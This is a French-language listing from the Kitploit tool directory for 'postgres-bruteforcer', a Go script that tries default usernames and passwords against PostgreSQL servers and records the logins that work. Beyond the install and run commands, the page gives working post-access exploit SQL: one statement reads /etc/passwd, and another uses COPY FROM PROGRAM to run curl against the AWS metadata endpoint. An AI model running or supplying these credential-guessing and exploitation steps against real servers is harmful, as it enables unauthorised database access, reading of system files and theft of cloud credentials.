Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
postgres-bruteforcer — Cet outil prend une liste d'identifiants par défaut et la teste contre un serveur PostgreSQL, puis consigne ceux qui fonctionnent et les bases de données auxquelles il a accès. | Kitploit
Outils/GitHubGitHub/randomrobbiebf/postgres-bruteforcer
Attaques de Mots de PasseExploitationTests d'IntrusionAuthentificationSécurité des Bases de Données
GitHubrandomrobbiebf/postgres-bruteforcer

postgres-bruteforcer

Cet outil prend une liste d'identifiants par défaut et la teste contre un serveur PostgreSQL, puis consigne ceux qui fonctionnent et les bases de données auxquelles il a accès.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
2il y a 3 ansPas encore vérifié

postgres-bruteforcer

À propos

Ce script Go lit une liste de noms d'utilisateur et de mots de passe depuis un fichier appelé creds.txt et les teste contre une base de données PostgreSQL.

Le script accepte une adresse IP du serveur PostgreSQL comme argument de ligne de commande ou un fichier texte contenant des adresses IP.

Si un accès est accordé, le script écrit cette sortie dans un fichier appelé pg-output.txt.

Si l'utilisateur postgres est disponible, il s'agit normalement d'un superutilisateur qui peut permettre une RCE, une LFI ou une SSRf.

Comment installer

root@kitploit:~
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest

Comment exécuter

root@kitploit:~
go run postgres-brute.go 1.1.1.1

postgres

Exemples d'exploits

Récupérer /etc/passwd/

root@kitploit:~
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;

SSRF - Récupérer les métadonnées AWS

root@kitploit:~
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;
Télécharger l’outil